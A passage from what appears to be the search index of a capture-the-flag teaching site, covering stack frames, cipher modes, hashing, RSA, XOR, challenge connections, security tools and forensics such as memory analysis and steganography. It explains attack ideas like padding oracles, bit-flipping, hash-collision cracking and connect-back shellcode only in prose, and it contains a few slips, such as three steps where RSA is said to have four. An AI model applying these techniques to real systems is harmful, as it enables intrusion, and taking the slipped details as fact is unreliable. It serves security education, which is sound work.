instruction moves ebp
into esp
, and pops the saved EBP.
EIP = 0x08048426 (ret)\nESP = 0xfffefffc\nEBP = 0xffff002c\n\n 0xffff0004: 0xffffa0a0 // say_hi argument 1\nESP -> 0xffff0000: 0x0804845a // Return address for say_hi\n
And finally, ret
pops the saved instruction pointer into eip
which causes the program to return to main with the same esp
, ebp
, and stack contents as when say_hi
was initially called.
EIP = 0x0804845a (add esp, 0x10)\nESP = 0xffff0000\nEBP = 0xffff002c\n\nESP -> 0xffff0004: 0xffffa0a0 // say_hi argument 1\n
"}, {"location": "cryptography/overview/", "title": "Overview", "text": ""}, {"location": "cryptography/overview/#cryptography", "title": "Cryptography", "text": "Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes which are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.
The word \u201ccryptography\u201d technically means the art of writing codes. When it comes to digital forensics, it\u2019s a method you can use to understand how data is constructed for your analysis.
"}, {"location": "cryptography/overview/#what-is-cryptography-used-for", "title": "What is cryptography used for?", "text": "Uses in every day software
Malicious uses
A Block Cipher is an algorithm which is used in conjunction with a cryptosystem in order to package a message into evenly distributed 'blocks' which are encrypted one at a time.
"}, {"location": "cryptography/what-are-block-ciphers/#definitions", "title": "Definitions", "text": "Note
In this case ~i~ represents an index over the # of blocks in the plaintext. F() and g() represent the function used to convert plaintext into ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#electronic-codebook-ecb", "title": "Electronic Codebook (ECB)", "text": "ECB is the most basic block cipher, it simply chunks up plaintext into blocks and independently encrypts those blocks and chains them all into a ciphertext.
"}, {"location": "cryptography/what-are-block-ciphers/#flaws", "title": "Flaws", "text": "
Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the CBC Penguin image below.
Original Image ECB Image Other Block Cipher Modes"}, {"location": "cryptography/what-are-block-ciphers/#cipher-block-chaining-cbc", "title": "Cipher Block Chaining (CBC)", "text": "CBC is an improvement upon ECB where an Initialization Vector is used in order to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of
Note
Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#propogating-cipher-block-chaining-pcbc", "title": "Propogating Cipher Block Chaining (PCBC)", "text": "PCBC is a less used cipher which modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process \"propogate\" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.
"}, {"location": "cryptography/what-are-block-ciphers/#counter-ctr", "title": "Counter (CTR)", "text": "
Note
Counter is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)
CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the exact same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.
"}, {"location": "cryptography/what-are-block-ciphers/#security-considerations", "title": "Security Considerations", "text": "
If the nonce chosen is non-random, it is important to concatonate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter) as adding or XORing the nonce with the counter would break security as an attacker can cause a collisions with the nonce and counter. An attacker with access to providing a plaintext, nonce and counter can then decrypt a block by using the ciphertext as seen in the decryption image.
"}, {"location": "cryptography/what-are-block-ciphers/#padding-oracle-attack", "title": "Padding Oracle Attack", "text": "A Padding Oracle Attack sounds complex, but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.
"}, {"location": "cryptography/what-are-block-ciphers/#requirements", "title": "Requirements", "text": "Hashing functions are one way functions which theoretically provide a unique output for every input. MD5, SHA-1, and other hashes which were considered secure are now found to have collisions or two different pieces of data which produce the same supposed unique output.
"}, {"location": "cryptography/what-are-hashing-functions/#string-hashing", "title": "String Hashing", "text": "A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn\u2019t). For example, the hash for \u201cdog\u201d should be different from other hashes.
You can use command line tools or online resources such as this one. Example: $ echo -n password | md5 5f4dcc3b5aa765d61d8327deb882cf99
Here, \u201cpassword\u201d is hashed with different hashing algorithms:
Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
"}, {"location": "cryptography/what-are-hashing-functions/#file-hashing", "title": "File Hashing", "text": "A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.
What is it used for? - File and data identification - Password/certificate storage comparison
How can we determine the hash of a file? You can use the md5sum command (or similar).
$ md5sum samplefile.txt\n3b85ec9ab2984b91070128be6aae25eb samplefile.txt\n
"}, {"location": "cryptography/what-are-hashing-functions/#hash-collisions", "title": "Hash Collisions", "text": "A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.
What\u2019s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer, since it\u2019s hard to get the passwords from hashes.
If you bruteforce by trying every possible piece of text or data, eventually you\u2019ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
Two different files on the same hard drive with the same cryptographic hash can be very interesting.
\u201cIt\u2019s now well-known that the cryptographic hash function MD5 has been broken,\u201d said Peter Selinger of Dalhousie University. \u201cIn March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.\u201d
For example, he cited this famous pair:
and
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.
Selinger said that \u201cthe algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.\u201d
Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl\u2019s Illustrated Guide. And here\u2019s a good article from DFI News that explores the same topic.
"}, {"location": "cryptography/what-are-stream-ciphers/", "title": "Stream Ciphers", "text": "A Stream Cipher is used for symmetric key cryptography, or when the same key is used to encrypt and decrypt data. Stream Ciphers encrypt pseudorandom sequences with bits of plaintext in order to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.
"}, {"location": "cryptography/what-are-stream-ciphers/#definitions", "title": "Definitions", "text": "A one time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers in order to generate a random ciphertext. The advantage of the one time pad is that it offers an immense amount of security BUT in order for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one time pads have little use in modern day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128 bit in length, in order to seed a pseudorandom keystream which is used to encrypt the text.
"}, {"location": "cryptography/what-are-stream-ciphers/#types-of-stream-ciphers", "title": "Types of Stream Ciphers", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#synchronous-stream-ciphers", "title": "Synchronous Stream Ciphers", "text": "A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher which XOR's the bits with the bits of the plaintext. Encryption and decryption require that the synchronus state cipher be in the same state, otherwise the message cannot be decrypted.
"}, {"location": "cryptography/what-are-stream-ciphers/#self-synchronizing-stream-ciphers", "title": "Self-synchronizing Stream Ciphers", "text": "A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher which uses the previous N digits in order to compute the keystream used for the next N characters.
Note
Seems a lot like block ciphers doesn't it? That's because block cipher feedback mode (CFB) is an example of a self-synchronizing stream ciphers.
"}, {"location": "cryptography/what-are-stream-ciphers/#stream-cipher-vulnerabilities", "title": "Stream Cipher Vulnerabilities", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#key-reuse", "title": "Key Reuse", "text": "The key tenet of using stream ciphers securely is to NEVER repeat key use because of the communative property of XOR. If C~1~ and C~2~ have been XOR'd with a key K, retrieving that key K is trivial because C~1~ XOR C~2~ = P~1~ XOR P~2~ and having an english language based XOR means that cryptoanalysis tools such as a character frequency analysis will work well due to the low entropy of the english language.
"}, {"location": "cryptography/what-are-stream-ciphers/#bit-flipping-attack", "title": "Bit-flipping Attack", "text": "Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit in order for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronus stream cipher.
"}, {"location": "cryptography/what-is-a-substitution-cipher/", "title": "Substitution Cipher", "text": "A Substitution Cipher is system of encryption where different symobls substitute a normal alphabet.
"}, {"location": "cryptography/what-is-a-vigenere-cipher/", "title": "Vigenere Cipher", "text": "A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar shifted alphabets.
The following table can be used to encode a message:
"}, {"location": "cryptography/what-is-a-vigenere-cipher/#encryption", "title": "Encryption", "text": "For example, encrypting the text SUPERSECRET
with CODE
would follow this process:
CODE
gets padded to the length of SUPERSECRET
so the key becomes CODECODECOD
SUPERSECRET
we use the table to get the Alphabet to use, in this instance row C
and column S
U
UISITGHGTSW
C
U
S
SUPERSECRET
The Caesar Cipher or Caesar Shift is a cipher which uses the alphabet in order to encode texts.
CAESAR
encoded with a shift of 8 is KIMAIZ
so ABCDEFGHIJKLMNOPQRSTUVWXYZ
becomes IJKLMNOPQRSTUVWXYZABCDEFGH
ROT13 is the same thing but a fixed shift of 13, this is a trivial cipher to bruteforce because there are only 25 shifts.
"}, {"location": "cryptography/what-is-rsa/", "title": "RSA", "text": "RSA, which is an abbreviation of the author's names (Rivest\u2013Shamir\u2013Adleman), is a cryptosystem which allows for asymmetric encryption. Asymmetric cryptosystems are alos commonly referred to as Public Key Cryptography where a public key is used to encrypt data and only a secret, private key can be used to decrypt the data.
"}, {"location": "cryptography/what-is-rsa/#definitions", "title": "Definitions", "text": "If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:
(m^e^)^d^ \u2261 m (mod n)
Note
The triple equals sign in this case refers to modular congruence which in this case means that there exists an integer k such that (m^e^)^d^ = kn + m
RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.
"}, {"location": "cryptography/what-is-rsa/#implementation", "title": "Implementation", "text": "RSA follows 4 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption
"}, {"location": "cryptography/what-is-rsa/#key-generation", "title": "Key Generation", "text": "We are going to follow along Wikipedia's small numbers example in order to make this idea a bit easier to understand.
Note
In This example we are using Carmichael's totient function where \u03bb(n) = lcm(\u03bb(p), \u03bb(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is \u03c6(n) = (p \u2212 1)(q \u2212 1)
Calculate \u03bb(n) = lcm(p-1, q-1)
Choose a public exponent such that 1 < e < \u03bb(n) and is coprime (not a factor of) \u03bb(n). The standard is most cases is 65537, but we will be using:
Now we have a public key of (3233, 17) and a private key of (3233, 413)
"}, {"location": "cryptography/what-is-rsa/#encryption", "title": "Encryption", "text": "With the public key, m can be encrypted trivially
The ciphertext is equal to m^e^ mod n or:
c = m^17^ mod 3233
"}, {"location": "cryptography/what-is-rsa/#decryption", "title": "Decryption", "text": "With the private key, m can be decrypted trivially as well
The plaintext is equal to c^d^ mod n or:
m = c^413^ mod 3233
"}, {"location": "cryptography/what-is-rsa/#exploitation", "title": "Exploitation", "text": "From the RsaCtfTool README
Attacks:
Data can be represented in different bases, an 'A' needs to be a numerical representation of Base 2 or binary so computers can understand them
"}, {"location": "cryptography/what-is-xor/#xor-basics", "title": "XOR Basics", "text": "An XOR or eXclusive OR is a bitwise operation indicated by ^
and shown by the following truth table:
So what XOR'ing bytes in the action 0xA0 ^ 0x2C
translates to is:
0b10001100
is equivelent to 0x8C
, a cool property of XOR is that it is reversable meaning 0x8C ^ 0x2C = 0xA0
and 0x8C ^ 0xA0 = 0x2C
XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:
>>> data = 'CAPTURETHEFLAG'\n>>> key = 'A'\n>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])\n>>> encrypted\n'\\x02\\x00\\x11\\x15\\x14\\x13\\x04\\x15\\t\\x04\\x07\\r\\x00\\x06'\n>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])\n>>> decrypted\n'CAPTURETHEFLAG'\n
This can be extended using a multibyte key by iterating in parallel with the data.
"}, {"location": "cryptography/what-is-xor/#exploiting-xor-encryption", "title": "Exploiting XOR Encryption", "text": ""}, {"location": "cryptography/what-is-xor/#single-byte-xor-encryption", "title": "Single Byte XOR Encryption", "text": "Single Byte XOR Encryption is trivial to bruteforce as there are only 255 key combinations to try.
"}, {"location": "cryptography/what-is-xor/#multibyte-xor-encryption", "title": "Multibyte XOR Encryption", "text": "Multibyte XOR gets exponentially harder the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the cipher text into groups based on the number of characters in the key. These groups then are bruteforced using the idea that some letters appear more frequently in the english alphabet than others.
"}, {"location": "faq/connecting-to-services/", "title": "How to connect to services", "text": "Note
While service challenges are often connected to with netcat or PuTTY, solving them will sometimes require using a scripting language like Python. CTF players often use Python alongside pwntools.
You can run pwntools right in your browser by using repl.it.
"}, {"location": "faq/connecting-to-services/#using-netcat", "title": "Using netcat", "text": "netcat
is a networking utility found on macOS and linux operating systems and allows for easy connections to CTF challenges. Service challenges will commonly give you an address and a port to connect to. The syntax for connecting to a service challenge with netcat is nc <ip> <port>
.
Windows users can connect to service challenges using ConEmu, which can be downloaded here. Connecting to service challenges with ConEmu is done by running nc <ip> <port>
.
Occasionally, certain kinds of exploits will require a server to connect back to. Some examples are connect back shellcode, cross site request forgery (CSRF), or blind cross site scripting (XSS).
"}, {"location": "faq/i-need-a-server/#i-just-a-web-server", "title": "I just a web server", "text": "If you just need a web server to host simple static websites or check access logs, we recommend using PythonAnywhere to host a simple web application. You can program a simple web application in popular Python web frameworks (e.g. Flask) and host it there for free.
"}, {"location": "faq/i-need-a-server/#i-need-a-real-server", "title": "I need a real server", "text": "If you need a real server (perhaps to run complex calculations or for shellcode to connect back to), we recommend DigitalOcean. DigitalOcean has a cheap $4-6/month plan for a small server that can be freely configured to do whatever you need.
"}, {"location": "faq/recommended-software/", "title": "Recommended Software", "text": "Generally in cyber security competitions, it is up to you and your team to determine what software to use. In some cases you may even end up creating new tools to give you an edge! That being said, here are some applications that we recommend for most competitors for most competitions.
"}, {"location": "faq/recommended-software/#disassemblersdecompilers", "title": "Disassemblers/Decompilers", "text": "Ghidra
Ghidra is a disassembler and decompiler that is open source and free to use. Released by the NSA, Ghidra is a capable tool and is the recommended disassembler for most use cases. An alternative is IDA Pro (a cyber security industry standard), however IDA Pro is not free and licenses are very expensive.
Binary Ninja
Binary Ninja is a commercial disassembler (with a free demo application) that provides an aesthetic and easy to use interface for binary reverse engineering. It also has a Web-UI which can be used freely. Binary Ninja's API and intermediate language make it superior than other disassemblers for certain use cases.
Pwndbg for GDB
Pwndbg is a plugin for the GNU Debugger (gdb) which makes it easier to dynamically reverse an application by stepping through its execution. In order to use pwndbg you will first need to have gdb installed via a Linux virtual machine or similar.
WinDbg
WinDbg is a debugger for Windows applications.
Burp Suite
Burp Suite is an HTTP proxy and set of tools which allow you to view, edit and replay your HTTP requests. While Burp Suite is a commercial tool, it offers a free version which is very capable and usually all that's needed.
sqlmap
sqlmap is a penetration testing tool that automates hte process of detecting and exploiting SQL injection flaws. It's open source and freely available.
Google Chrome
Google Chrome is a web browser with a suite of developer tools and extensions. These tools and extensions can be useful when investigating a web application.
Wireshark
Wireshark is a PCAP analysis tool which allows you to analyze and record network traffic.
VMware
VMware is a company that creates virtualization software that allows you to run other operating systems within your existing operating system. While their products are not generally free, their software is best in class for virtualization.
VMWare Fusion, VMWare Workstation, and VMWare Player are three of their virtualization products that can be used on your computer to run other OS'es. VMWare Player is free to use for Windows and Linux.
VirtualBox
VirtualBox is open source virtualization software which allows you to virtualize other operating systems. It's very similar to VMWare products but free for all OS'es. It is generally slower than VMWare but works well enough for most people.
Python
Python is an easy-to-learn, widely used programming language which supports complex applications as well as small scripts. It has a large community which provides thousands of useful packages. Python is widely used in the cyber security industry and is generally the recommended language to use in CTF competition.
pwntools
Pwntools is a Python package which makes interacting with processes and networks easy. It is a recommended library for interacting with binary exploitation and networking based CTF challenges.
Note
You can run pwntools right in your browser by using repl.it. Create a new Python repl and install the pwntools
package. After that you'll be able to use pwntools directly from your browser without having to install anything.
CyberChef
CyberChef is a simple web app for analysing and decoding data without having to deal with complex tools or programming languages.
Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data which is seemingly deleted, not stored, or worse, covertly recorded.
An important part of forensics is having the right tools, as well as being familiar with the following topics:
File Extensions are not the sole way to identify the type of a file, files have certain leading bytes called file signatures which allow programs to parse the data in a consistent manner. Files can also contain additional \"hidden\" data called metadata which can be useful in finding out information about the context of a file's data.
"}, {"location": "forensics/what-are-file-formats/#file-signatures", "title": "File Signatures", "text": "File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally they\u2019re 2-4 bytes long, found at the beginning of a file.
"}, {"location": "forensics/what-are-file-formats/#what-is-it-used-for", "title": "What is it used for?", "text": "Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type in order to open it properly.
"}, {"location": "forensics/what-are-file-formats/#how-do-you-find-the-file-signature", "title": "How do you find the file signature?", "text": "You need to be able to look at the binary data that constitutes the file you\u2019re examining. To do this, you\u2019ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler\u2019s.
"}, {"location": "forensics/what-are-file-formats/#example", "title": "Example", "text": "The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600
or in ASCII \u02c7\u00ff\u02c7\u2021 JFIF
where \\x00
and \\x10
lack symbols.
Searching in Gary Kessler\u2019s database shows that this file signature belongs to a JPEG/JFIF graphics file
, exactly what we suspect.
A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name \u201chex\u201d comes from \u201chexadecimal,\u201d a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.
"}, {"location": "forensics/what-is-a-hex-editor/#example", "title": "Example", "text": "Open fileA.jpg in a hex editor. (Most Hex editors have either a \u201cFile > Open\u201d option or a simple drag and drop.)
When you open fileA.jpg in your hex editor, you should see something similar to this:
Your hex editor should also have a \u201cgo to\u201d or \u201cfind\u201d feature so you can jump to a specific byte.
"}, {"location": "forensics/what-is-disk-imaging/", "title": "Disk Imaging", "text": "A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It\u2019s a bit-by-\u00adbit or bitstream file that\u2019s an exact, unaltered copy of the media being duplicated.
Wikipedia said that the most straight\u00adforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. \u201cThis can be a time-consuming process, especially for disks with a large capacity,\u201d Wikipedia said.
To prevent write access to the disk, you can use a write blocker. It\u2019s also common to calculate a cryptographic hash of the entire disk when imaging it. \u201cCommonly-used cryptographic hashes are MD5, SHA1 and/or SHA256,\u201d said Wikipedia. \u201cBy recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself provides no protection against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.\u201d
Why image a disk? Forensic imaging: - Prevents tampering with the original data\u00ad evidence - Allows you to play around with the copy, without worrying about messing up the original
"}, {"location": "forensics/what-is-disk-imaging/#forensic-image-extraction-exmple", "title": "Forensic Image Extraction Exmple", "text": "This example uses the tool AccessData FTK Imager.
Step 1: Go to File > Create Disk Image
Step 2: Select Physical Drive
, because the USB or hard drive you\u2019re imaging is a physical device or drive.
Step 3: Select the drive you\u2019re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.
Step 4: Add a new image destination
Step 5: Select whichever image type you want. Choose Raw (dd)
if you\u2019re a beginner, since it\u2019s the most common type
Step 6: Fill in all the evidence information
Step 7: Choose where you want to store it
Step 8: The image destination has been added. Now you can start the image extraction
Step 9: Wait for the image to be extracted
Step 10: This is the completed extraction
Step 11: Add the image you just created so that you can view it
Step 12: This time, choose image file, since that\u2019s what you just created
Step 13: Enter the path of the image you just created
Step 14: View the image.
Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root]
in the Evidence Tree and look in the File List
Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo
Step 17: Extract files of interest for further analysis by selecting, right-clicking and choosing Export Files
There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuble information can be found within memory dumps, that is images taken of RAM. These dumps of data are often very large, but can be analyzed using a tool called Volatility
"}, {"location": "forensics/what-is-memory-forensics/#volatility-basics", "title": "Volatility Basics", "text": "Memory forensics isn't all that complicated, the hardest part would be using your toolset correctly. A good workflow is as follows:
strings
for cluesIn order to properly use Volatility you must supply a profile with --profile=PROFILE
, therefore before any sleuthing, you need to determine the profile using imageinfo:
$ python vol.py -f ~/image.raw imageinfo\nVolatility Foundation Volatility Framework 2.4\nDetermining profile based on KDBG search...\n\n Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64\n AS Layer1 : AMD64PagedMemory (Kernel AS)\n AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)\n PAE type : PAE\n DTB : 0x187000L\n KDBG : 0xf80002803070\n Number of Processors : 1\n Image Type (Service Pack) : 0\n KPCR for CPU 0 : 0xfffff80002804d00L\n KUSER_SHARED_DATA : 0xfffff78000000000L\n Image date and time : 2012-02-22 11:29:02 UTC+0000\n Image local date and time : 2012-02-22 03:29:02 -0800\n
"}, {"location": "forensics/what-is-memory-forensics/#dump-processes", "title": "Dump Processes", "text": "In order to view processes, the pslist
or pstree
or psscan
command can be used.
$ python vol.py -f ~/image.raw pslist --profile=Win7SP0x64 pstree\nVolatility Foundation Volatility Framework 2.5\nOffset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit\n------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------\n0xffffa0ee12532180 System 4 0 108 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n0xffffa0ee1389d040 smss.exe 232 4 3 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n...\n0xffffa0ee128c6780 VBoxTray.exe 3324 1123 10 0 1 0 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14108780 OneDrive.exe 1422 1123 10 0 1 1 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14ade080 svchost.exe 228 121 1 0 1 0 2018-04-22 20:14:43 UTC+0000\n0xffffa0ee1122b080 notepad.exe 2019 1123 1 0 1 0 2018-04-22 20:14:49 UTC+0000\n
"}, {"location": "forensics/what-is-memory-forensics/#process-memory-dump", "title": "Process Memory Dump", "text": "Dumping the memory of a process can prove to be fruitful, say we want to dump the data from notepad.exe:
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/\nVolatility Foundation Volatility Framework 2.4\n************************************************************************\nWriting System [ 2019] to 2019.dmp\n\n$ ls -alh dump/2019.dmp\n-rw-r--r-- 1 user staff 111M Apr 22 20:47 dump/2019.dmp\n
"}, {"location": "forensics/what-is-memory-forensics/#other-useful-commands", "title": "Other Useful Commands", "text": "There are plenty of commands that Volatility offers but some highlights include:
$ python vol.py -f IMAGE --profile=PROFILE connections
: view network connections$ python vol.py -f IMAGE --profile=PROFILE cmdscan
: view commands that were run in cmd promptMetadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number and album.
"}, {"location": "forensics/what-is-metadata/#what-kind-of-file-metadata-is-useful", "title": "What kind of file metadata is useful?", "text": "Potentially, any file metadata you can find could be useful.
"}, {"location": "forensics/what-is-metadata/#how-do-i-find-it", "title": "How do I find it?", "text": "Note
EXIF Data is metadata attached to photos which can include location, time, and device information.
One of our favorite tools is exiftool, which displays metadata for an input file, including: - File size - Dimensions (width and height) - File type - Programs used to create (e.g. Photoshop) - OS used to create (e.g. Apple)
Run command line: exiftool(-k).exe [filename]
and you should see something like this:
Let's take a look at File A's metadata with exiftool:
File type
Image description
Make and camera info
GPS Latitude/Longitude
"}, {"location": "forensics/what-is-metadata/#timestamps", "title": "Timestamps", "text": "Timestamps are data that indicate the time of certain events (MAC): - Modification \u2013 when a file was modified - Access \u2013 when a file or entries were read or accessed - Creation \u2013 when files or entries were created
"}, {"location": "forensics/what-is-metadata/#types-of-timestamps", "title": "Types of timestamps", "text": "Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.
"}, {"location": "forensics/what-is-metadata/#timeline-patterns", "title": "Timeline Patterns", "text": "There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.
"}, {"location": "forensics/what-is-metadata/#examples", "title": "Examples", "text": "
We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?
By using time stamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileB, and fileC was created by modifying fileA in a different way.
Follow along as we demonstrate.
We\u2019ll start by analyzing images in AccessData FTK Imager, where there\u2019s a Properties window that shows you some information about the file or folder you\u2019ve selected.
Here are the extracted MAC times for fileA, fileB, fileC and fileD: Note, AccessData FTK Imager assumes that the file times on the drive are in UTC (Universal Coordinated Time). I subtracted four hours, since the USB was set up in Eastern Standard Time. This isn\u2019t necessary, but it helps me understand the times a bit better.
Highlight timestamps that are the same, if timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.
Identify timestamp patterns.
"}, {"location": "forensics/what-is-stegonagraphy/", "title": "Steganography", "text": "Steganography is the practice of hiding data in plain sight. Steganography is often embedded in images or audio.
You could send a picture of a cat to a friend and hide text inside. Looking at the image, there\u2019s nothing to make anyone think there\u2019s a message hidden inside it.
You could also hide a second image inside the first.
"}, {"location": "forensics/what-is-stegonagraphy/#steganography-detection", "title": "Steganography Detection", "text": "So we can hide text and an image, how do we find out if there is hidden data?
FileA and FileD appear the same, but they\u2019re different. Also, FileD was modified after it was copied, so it\u2019s possible there might be steganography in it.
FileB and FileC don\u2019t appear to have been modified after being created. That doesn\u2019t rule out the possibility that there\u2019s steganography in them, but you\u2019re more likely to find it in fileD. This brings up two questions:
File are made of bytes. Each byte is composed of eight bits.
Changing the least-significant bit (LSB) doesn\u2019t change the value very much.
So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.
"}, {"location": "forensics/what-is-stegonagraphy/#lsb-steganography-in-images", "title": "LSB Steganography in Images", "text": "LSB Steganography or Least Significant Bit Steganography is a method of Steganography where data is recorded in the lowest bit of a byte.
Say an image has a pixel with an RGB value of (255, 255, 255), the bits of those RGB values will look like
1 1 1 1 1 1 1 1By modifying the lowest, or least significant, bit, we can use the 1 bit space across every RGB value for every pixel to construct a message.
1 1 1 1 1 1 1 0The reason steganography is hard to detect by sight is because a 1 bit difference in color is insignificant as seen below.
"}, {"location": "forensics/what-is-stegonagraphy/#example", "title": "Example", "text": "Let\u2019s say we have an image, and part of it contains the following binary:
And let\u2019s say we want to hide the character y inside.
First, we need to convert the hidden message to binary.
Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.
And again:
And again:
And again:
And again:
And again:
And again:
And once more:
Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you\u2019ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
"}, {"location": "forensics/what-is-stegonagraphy/#what-other-types-of-steganography-are-there", "title": "What other types of steganography are there?", "text": "Steganography is hard for the defense side, because there\u2019s practically an infinite number of ways it could be carried out. Here are a few examples: - LSB steganography: different bits, different bit combinations - Encode in every certain number of bytes - Use a password - Hide in different places - Use encryption on top of steganography
"}, {"location": "forensics/what-is-wireshark/", "title": "Wireshark", "text": "Note from our infrastructure team
\"Wireshark saved me hours on my last tax return! - David\"
\"[Wireshark] is great for ruining your weekend and fixing pesky networking problems!\" - Max\"
\"Wireshark is the powerhouse of the cell. - Joe\"
\"Does this cable do anything? - Ayyaz\"
Wireshark is a network protocol analyzer which is often used in CTF challenges to look at recorded network traffic. Wireshark uses a filetype called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.
"}, {"location": "forensics/what-is-wireshark/#interface", "title": "Interface", "text": "Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.
The network traffic displayed initially shows the packets in order of which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.
In order to apply filters, simply enter the constraining factor, for example 'http', in the display filter bar.
Filters can be chained together using '&&' notation. In order to filter by IP, ensure a double equals '==' is used.
The most pertinent part of a packet is its data payload and protocol information.
